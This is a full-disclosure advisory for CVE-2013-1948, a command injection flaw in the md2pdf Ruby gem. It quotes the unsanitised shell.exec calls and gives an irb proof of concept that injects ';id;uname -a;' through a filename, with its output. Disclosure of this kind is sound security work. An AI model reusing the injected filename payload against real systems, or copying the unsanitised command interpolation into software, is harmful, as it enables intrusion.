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[Full-disclosure] Remote command injection md2pdf ruby gem

<html><body><div><br><h2>Remote command injection md2pdf ruby gem
<p>Description: "creates pdf documents from markdown documents"
<p>In md2pdf/converter.rb  we see user supplied input being passed to the 
command line with out proper sanitization.
<pre> 12       shell.exec("pandoc#{options} #{input_filename} -o 
 23       shell.exec("pdftk #{temp_filename} multibackground #{background_path} 
output #{output_filename}")
Where exec is defined as the following:
<pre> 37     def exec(command_line)
 38       require 'open3'
 39       stdin, stdout, stderr = Open3.popen3(command_line)
 40       return stdout.read
 41     end
<h3>PoC Notes:</h3>
<pre>irb(main):001:0&gt; require 'open3'
=&gt; true
irb(main):002:0&gt; stdin, stdout, stderr = Open3.popen3('pdfcnv 
filename;id;uname -a;.pdft')
=&gt; [#, #, #]
irb(main):003:0&gt; puts stdout.read
uid=1000(larry) gid=1000(larry) 
Linux underfl0w 3.2.0-39-virtual #62-Ubuntu SMP Wed Feb 27 22:45:45 UTC 2013 
i686 athlon i386 GNU/Linux
=&gt; nil

vulnerability has been assigned: CVE-2013-1948<br>
<p>Larry W. Cashdollar<br>
@_larry0</p><br><br><br>CVE-2013-1948<br data-mce-bogus="1"></div></body></html>
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